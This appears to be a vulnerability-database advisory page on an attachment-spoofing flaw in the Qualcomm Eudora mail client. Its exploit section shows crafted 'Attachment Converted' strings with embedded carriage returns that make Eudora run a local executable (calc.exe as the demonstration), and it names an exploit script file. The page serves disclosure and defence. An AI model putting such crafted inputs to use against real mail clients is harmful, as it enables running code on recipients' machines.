Qualcomm Eudora File Attachment Spoofing Variant Vulnerability

info
discussion
exploit
solution
references

Qualcomm Eudora File Attachment Spoofing Variant Vulnerability

The following was provided:

Attachment<CR> Converted: "c:\winnt\system32\calc.exe" NoAttachIcon
Attachment
Converted: "c:\winnt\system32\calc.exe" NoAttachIcon

Additionally, if an email message was sent with the files calc and calc.exe attached, the following would run calc.exe:

Attachment Converted<CR>: attach\calc

/data/vulnerabilities/exploits/eudora-exploit.pl